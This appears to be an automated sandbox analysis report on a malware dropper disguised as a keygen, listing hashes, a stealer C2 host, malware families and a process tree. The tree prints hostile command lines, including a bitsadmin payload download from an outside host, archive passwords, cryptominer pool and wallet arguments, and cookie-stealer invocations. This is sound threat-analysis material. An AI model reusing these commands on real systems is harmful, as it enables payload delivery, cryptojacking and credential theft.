Resubmissions

08-07-2021 12:18

210708-8z6d5h8z2n 10

06-07-2021 17:53

210706-g6we6sa7sa 10

19-06-2021 18:17

210619-vr8bj2dzfn 10

17-06-2021 21:39

210617-a9cvlnmrbx 10

11-06-2021 17:26

210611-wvab1yw2tj 10

08-06-2021 06:47

210608-qrbpch3y46 10

08-06-2021 06:47

210608-64tndgm1ln 10

05-06-2021 18:40

210605-cd6qpr55sx 10

04-06-2021 11:56

210604-5c416rs3ns 10

04-06-2021 08:52

210604-jy9885jen2 10

Analysis

  • max time kernel
    1800s
  • max time network
    1796s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    26-04-2021 18:53

General

  • Target

    keygen-step-4.exe

  • Size

    4.6MB

  • MD5

    563107b1df2a00f4ec868acd9e08a205

  • SHA1

    9cb9c91d66292f5317aa50d92e38834861e9c9b7

  • SHA256

    bf2bd257dde4921ce83c7c1303fafe7f9f81e53c2775d3c373ced482b22eb8a9

  • SHA512

    99a8d247fa435c4cd95be7bc64c7dd6e382371f3a3c160aac3995fd705e4fd3f6622c23784a4ae3457c87536347d15eda3f08aa616450778a99376df540d74d1

Malware Config

Extracted

Family

fickerstealer

C2

sodaandcoke.top:80

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • fickerstealer

    Ficker is an infostealer written in Rust and ASM.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • XMRig Miner Payload 3 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 58 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 10 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • NSIS installer 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 24 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 48 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
    1⤵
      PID:1896
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
      1⤵
        PID:2364
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2688
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s WpnService
        1⤵
          PID:2712
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Browser
          1⤵
            PID:2672
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
            1⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2404
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s SENS
            1⤵
              PID:1456
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s Themes
              1⤵
                PID:1272
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                1⤵
                  PID:1264
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                  1⤵
                    PID:1068
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                    1⤵
                    • Drops file in System32 directory
                    PID:948
                    • C:\Users\Admin\AppData\Roaming\hiditvd
                      C:\Users\Admin\AppData\Roaming\hiditvd
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:1332
                      • C:\Users\Admin\AppData\Roaming\hiditvd
                        C:\Users\Admin\AppData\Roaming\hiditvd
                        3⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:5620
                    • C:\Users\Admin\AppData\Roaming\cfditvd
                      C:\Users\Admin\AppData\Roaming\cfditvd
                      2⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:1792
                    • C:\Users\Admin\AppData\Roaming\cfditvd
                      C:\Users\Admin\AppData\Roaming\cfditvd
                      2⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:5732
                    • C:\Users\Admin\AppData\Roaming\hiditvd
                      C:\Users\Admin\AppData\Roaming\hiditvd
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:5036
                      • C:\Users\Admin\AppData\Roaming\hiditvd
                        C:\Users\Admin\AppData\Roaming\hiditvd
                        3⤵
                        • Executes dropped EXE
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:1468
                    • C:\Users\Admin\AppData\Roaming\cfditvd
                      C:\Users\Admin\AppData\Roaming\cfditvd
                      2⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:1984
                    • C:\Users\Admin\AppData\Roaming\hiditvd
                      C:\Users\Admin\AppData\Roaming\hiditvd
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:2680
                      • C:\Users\Admin\AppData\Roaming\hiditvd
                        C:\Users\Admin\AppData\Roaming\hiditvd
                        3⤵
                        • Executes dropped EXE
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:1832
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                    1⤵
                      PID:1000
                    • C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe
                      "C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe"
                      1⤵
                      • Checks computer location settings
                      • Suspicious use of WriteProcessMemory
                      PID:3592
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe"
                        2⤵
                        • Executes dropped EXE
                        • Drops file in Program Files directory
                        • Suspicious use of SetWindowsHookEx
                        • Suspicious use of WriteProcessMemory
                        PID:3772
                        • C:\Windows\SysWOW64\rundll32.exe
                          "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                          3⤵
                          • Loads dropped DLL
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:2808
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:944
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of WriteProcessMemory
                        PID:496
                        • C:\Users\Admin\AppData\Local\Temp\is-OC1G6.tmp\Install.tmp
                          "C:\Users\Admin\AppData\Local\Temp\is-OC1G6.tmp\Install.tmp" /SL5="$50080,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                          3⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious use of WriteProcessMemory
                          PID:188
                          • C:\Users\Admin\AppData\Local\Temp\is-JD9V0.tmp\Ultra.exe
                            "C:\Users\Admin\AppData\Local\Temp\is-JD9V0.tmp\Ultra.exe" /S /UID=burnerch1
                            4⤵
                            • Drops file in Drivers directory
                            • Executes dropped EXE
                            • Adds Run key to start application
                            • Drops file in Program Files directory
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:2700
                            • C:\Program Files\Windows Multimedia Platform\MRHBPOTJGP\ultramediaburner.exe
                              "C:\Program Files\Windows Multimedia Platform\MRHBPOTJGP\ultramediaburner.exe" /VERYSILENT
                              5⤵
                              • Executes dropped EXE
                              • Suspicious use of WriteProcessMemory
                              PID:4176
                              • C:\Users\Admin\AppData\Local\Temp\is-KJG8A.tmp\ultramediaburner.tmp
                                "C:\Users\Admin\AppData\Local\Temp\is-KJG8A.tmp\ultramediaburner.tmp" /SL5="$301EE,281924,62464,C:\Program Files\Windows Multimedia Platform\MRHBPOTJGP\ultramediaburner.exe" /VERYSILENT
                                6⤵
                                • Executes dropped EXE
                                • Drops file in Program Files directory
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of FindShellTrayWindow
                                • Suspicious use of WriteProcessMemory
                                PID:4208
                                • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                  "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                  7⤵
                                  • Executes dropped EXE
                                  PID:4244
                            • C:\Users\Admin\AppData\Local\Temp\36-73259-af0-883ae-9179037eca04d\Raeshonaelaebu.exe
                              "C:\Users\Admin\AppData\Local\Temp\36-73259-af0-883ae-9179037eca04d\Raeshonaelaebu.exe"
                              5⤵
                              • Executes dropped EXE
                              • Checks computer location settings
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4256
                            • C:\Users\Admin\AppData\Local\Temp\bb-38678-b21-ef497-dae96167f4c6e\Xushimaeranu.exe
                              "C:\Users\Admin\AppData\Local\Temp\bb-38678-b21-ef497-dae96167f4c6e\Xushimaeranu.exe"
                              5⤵
                              • Executes dropped EXE
                              • Suspicious behavior: EnumeratesProcesses
                              PID:4336
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wy2hvfvt.12g\instEU.exe & exit
                                6⤵
                                  PID:5360
                                  • C:\Users\Admin\AppData\Local\Temp\wy2hvfvt.12g\instEU.exe
                                    C:\Users\Admin\AppData\Local\Temp\wy2hvfvt.12g\instEU.exe
                                    7⤵
                                    • Executes dropped EXE
                                    PID:5784
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\o11wru3c.s55\google-game.exe & exit
                                  6⤵
                                    PID:6136
                                    • C:\Users\Admin\AppData\Local\Temp\o11wru3c.s55\google-game.exe
                                      C:\Users\Admin\AppData\Local\Temp\o11wru3c.s55\google-game.exe
                                      7⤵
                                      • Executes dropped EXE
                                      • Suspicious use of SetWindowsHookEx
                                      PID:5324
                                      • C:\Windows\SysWOW64\rundll32.exe
                                        "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                        8⤵
                                        • Loads dropped DLL
                                        PID:6024
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2djgxuqn.kz2\askinstall39.exe & exit
                                    6⤵
                                      PID:5500
                                      • C:\Users\Admin\AppData\Local\Temp\2djgxuqn.kz2\askinstall39.exe
                                        C:\Users\Admin\AppData\Local\Temp\2djgxuqn.kz2\askinstall39.exe
                                        7⤵
                                        • Executes dropped EXE
                                        PID:5848
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd.exe /c taskkill /f /im chrome.exe
                                          8⤵
                                            PID:5440
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /f /im chrome.exe
                                              9⤵
                                              • Executes dropped EXE
                                              • Adds Run key to start application
                                              • Suspicious use of SetThreadContext
                                              • Kills process with taskkill
                                              PID:188
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yrcs3bhy.kek\y1.exe & exit
                                        6⤵
                                          PID:2660
                                          • C:\Users\Admin\AppData\Local\Temp\yrcs3bhy.kek\y1.exe
                                            C:\Users\Admin\AppData\Local\Temp\yrcs3bhy.kek\y1.exe
                                            7⤵
                                            • Executes dropped EXE
                                            PID:5780
                                            • C:\Users\Admin\AppData\Local\Temp\QHUMpxO7xp.exe
                                              "C:\Users\Admin\AppData\Local\Temp\QHUMpxO7xp.exe"
                                              8⤵
                                              • Executes dropped EXE
                                              • Modifies system certificate store
                                              PID:4168
                                              • C:\Users\Admin\AppData\Roaming\1619463487958.exe
                                                "C:\Users\Admin\AppData\Roaming\1619463487958.exe" /sjson "C:\Users\Admin\AppData\Roaming\1619463487958.txt"
                                                9⤵
                                                • Executes dropped EXE
                                                PID:2076
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\QHUMpxO7xp.exe"
                                                9⤵
                                                  PID:6004
                                                  • C:\Windows\SysWOW64\PING.EXE
                                                    ping 127.0.0.1 -n 3
                                                    10⤵
                                                    • Runs ping.exe
                                                    PID:3184
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\yrcs3bhy.kek\y1.exe"
                                                8⤵
                                                  PID:4712
                                                  • C:\Windows\SysWOW64\timeout.exe
                                                    timeout /T 10 /NOBREAK
                                                    9⤵
                                                    • Delays execution with timeout.exe
                                                    PID:4028
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4actbci5.0ys\SunLabsPlayer.exe /S & exit
                                              6⤵
                                                PID:5312
                                                • C:\Users\Admin\AppData\Local\Temp\4actbci5.0ys\SunLabsPlayer.exe
                                                  C:\Users\Admin\AppData\Local\Temp\4actbci5.0ys\SunLabsPlayer.exe /S
                                                  7⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  • Drops file in Program Files directory
                                                  PID:4756
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsfD26B.tmp\tempfile.ps1"
                                                    8⤵
                                                      PID:4204
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsfD26B.tmp\tempfile.ps1"
                                                      8⤵
                                                        PID:4892
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsfD26B.tmp\tempfile.ps1"
                                                        8⤵
                                                          PID:5460
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsfD26B.tmp\tempfile.ps1"
                                                          8⤵
                                                            PID:5912
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsfD26B.tmp\tempfile.ps1"
                                                            8⤵
                                                              PID:4144
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsfD26B.tmp\tempfile.ps1"
                                                              8⤵
                                                                PID:5156
                                                                • C:\Windows\System32\Conhost.exe
                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  9⤵
                                                                    PID:5720
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsfD26B.tmp\tempfile.ps1"
                                                                  8⤵
                                                                  • Checks for any installed AV software in registry
                                                                  PID:5612
                                                                • C:\Windows\SysWOW64\bitsadmin.exe
                                                                  "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                                  8⤵
                                                                  • Download via BitsAdmin
                                                                  PID:5300
                                                                • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                  "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pPnmElQXTNHIIFt1 -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                  8⤵
                                                                  • Executes dropped EXE
                                                                  • Drops file in Program Files directory
                                                                  PID:4740
                                                                • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                  "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pgOoJ99SYVwji1SL -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                  8⤵
                                                                  • Executes dropped EXE
                                                                  PID:1480
                                                                  • C:\Windows\System32\Conhost.exe
                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    9⤵
                                                                      PID:5056
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsfD26B.tmp\tempfile.ps1"
                                                                    8⤵
                                                                      PID:5444
                                                                      • C:\Windows\System32\Conhost.exe
                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        9⤵
                                                                          PID:5512
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsfD26B.tmp\tempfile.ps1"
                                                                        8⤵
                                                                          PID:5424
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsfD26B.tmp\tempfile.ps1"
                                                                          8⤵
                                                                            PID:4976
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsfD26B.tmp\tempfile.ps1"
                                                                            8⤵
                                                                              PID:5224
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsfD26B.tmp\tempfile.ps1"
                                                                              8⤵
                                                                                PID:1160
                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\yoSyQZIYq\yoSyQZIYq.dll" yoSyQZIYq
                                                                                8⤵
                                                                                • Loads dropped DLL
                                                                                PID:2156
                                                                                • C:\Windows\system32\rundll32.exe
                                                                                  C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\yoSyQZIYq\yoSyQZIYq.dll" yoSyQZIYq
                                                                                  9⤵
                                                                                  • Loads dropped DLL
                                                                                  • Drops file in System32 directory
                                                                                  • Drops file in Program Files directory
                                                                                  PID:4468
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsfD26B.tmp\tempfile.ps1"
                                                                                8⤵
                                                                                  PID:5436
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsfD26B.tmp\tempfile.ps1"
                                                                                  8⤵
                                                                                    PID:3840
                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsfD26B.tmp\tempfile.ps1"
                                                                                    8⤵
                                                                                    • Drops file in Program Files directory
                                                                                    PID:4436
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsfD26B.tmp\tempfile.ps1"
                                                                                    8⤵
                                                                                      PID:4780
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsfD26B.tmp\tempfile.ps1"
                                                                                      8⤵
                                                                                        PID:1824
                                                                                      • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                        "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                        8⤵
                                                                                        • Executes dropped EXE
                                                                                        • Loads dropped DLL
                                                                                        • Drops file in Program Files directory
                                                                                        PID:4000
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\a2u0rysm.gqy\inst.exe & exit
                                                                                    6⤵
                                                                                      PID:5364
                                                                                      • C:\Users\Admin\AppData\Local\Temp\a2u0rysm.gqy\inst.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\a2u0rysm.gqy\inst.exe
                                                                                        7⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:4788
                                                                                    • C:\Windows\System32\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wtitqd0z.bfq\GcleanerWW.exe /mixone & exit
                                                                                      6⤵
                                                                                        PID:5300
                                                                                      • C:\Windows\System32\cmd.exe
                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\djwzpu0p.f4p\toolspab1.exe & exit
                                                                                        6⤵
                                                                                          PID:4836
                                                                                          • C:\Users\Admin\AppData\Local\Temp\djwzpu0p.f4p\toolspab1.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\djwzpu0p.f4p\toolspab1.exe
                                                                                            7⤵
                                                                                            • Executes dropped EXE
                                                                                            • Suspicious use of SetThreadContext
                                                                                            PID:4472
                                                                                            • C:\Users\Admin\AppData\Local\Temp\djwzpu0p.f4p\toolspab1.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\djwzpu0p.f4p\toolspab1.exe
                                                                                              8⤵
                                                                                              • Executes dropped EXE
                                                                                              • Loads dropped DLL
                                                                                              • Checks SCSI registry key(s)
                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                              PID:5456
                                                                                        • C:\Windows\System32\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vrf3txmh.xot\app.exe /8-2222 & exit
                                                                                          6⤵
                                                                                            PID:5204
                                                                                            • C:\Users\Admin\AppData\Local\Temp\vrf3txmh.xot\app.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\vrf3txmh.xot\app.exe /8-2222
                                                                                              7⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:5836
                                                                                              • C:\Users\Admin\AppData\Local\Temp\vrf3txmh.xot\app.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\vrf3txmh.xot\app.exe" /8-2222
                                                                                                8⤵
                                                                                                • Executes dropped EXE
                                                                                                • Modifies data under HKEY_USERS
                                                                                                PID:5928
                                                                                          • C:\Windows\System32\cmd.exe
                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uiqnykky.lol\c7ae36fa.exe & exit
                                                                                            6⤵
                                                                                              PID:5720
                                                                                              • C:\Users\Admin\AppData\Local\Temp\uiqnykky.lol\c7ae36fa.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\uiqnykky.lol\c7ae36fa.exe
                                                                                                7⤵
                                                                                                • Executes dropped EXE
                                                                                                • Loads dropped DLL
                                                                                                • Checks SCSI registry key(s)
                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                PID:1916
                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                      2⤵
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:4104
                                                                                      • C:\Users\Admin\AppData\Roaming\9996.tmp.exe
                                                                                        "C:\Users\Admin\AppData\Roaming\9996.tmp.exe"
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        • Suspicious use of SetThreadContext
                                                                                        PID:4148
                                                                                        • C:\Users\Admin\AppData\Roaming\9996.tmp.exe
                                                                                          "C:\Users\Admin\AppData\Roaming\9996.tmp.exe"
                                                                                          4⤵
                                                                                          • Executes dropped EXE
                                                                                          • Checks processor information in registry
                                                                                          PID:5888
                                                                                      • C:\Users\Admin\AppData\Roaming\9B7B.tmp.exe
                                                                                        "C:\Users\Admin\AppData\Roaming\9B7B.tmp.exe"
                                                                                        3⤵
                                                                                          PID:188
                                                                                          • C:\Windows\system32\msiexec.exe
                                                                                            -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w25949@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                                                                            4⤵
                                                                                              PID:5392
                                                                                            • C:\Windows\system32\msiexec.exe
                                                                                              -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w6605 --cpu-max-threads-hint 50 -r 9999
                                                                                              4⤵
                                                                                              • Blocklisted process makes network request
                                                                                              PID:5644
                                                                                          • C:\Users\Admin\AppData\Roaming\9C96.tmp.exe
                                                                                            "C:\Users\Admin\AppData\Roaming\9C96.tmp.exe"
                                                                                            3⤵
                                                                                            • Executes dropped EXE
                                                                                            • Adds Run key to start application
                                                                                            PID:4524
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                            3⤵
                                                                                              PID:5540
                                                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                                                ping 127.0.0.1
                                                                                                4⤵
                                                                                                • Runs ping.exe
                                                                                                PID:5708
                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe"
                                                                                            2⤵
                                                                                            • Executes dropped EXE
                                                                                            • Checks whether UAC is enabled
                                                                                            PID:6040
                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe"
                                                                                            2⤵
                                                                                            • Executes dropped EXE
                                                                                            • Adds Run key to start application
                                                                                            PID:2636
                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                              3⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:4760
                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                              3⤵
